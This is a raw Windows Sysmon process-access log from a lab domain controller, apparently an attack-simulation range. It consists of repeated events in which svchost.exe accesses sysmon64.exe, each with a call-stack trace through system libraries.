13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001431Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001430Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001429Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.455{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001421Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001420Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001419Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001418Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001417Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001416Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001415Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001414Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001413Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001412Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001411Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.439{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001410Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001409Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.423{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001408Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 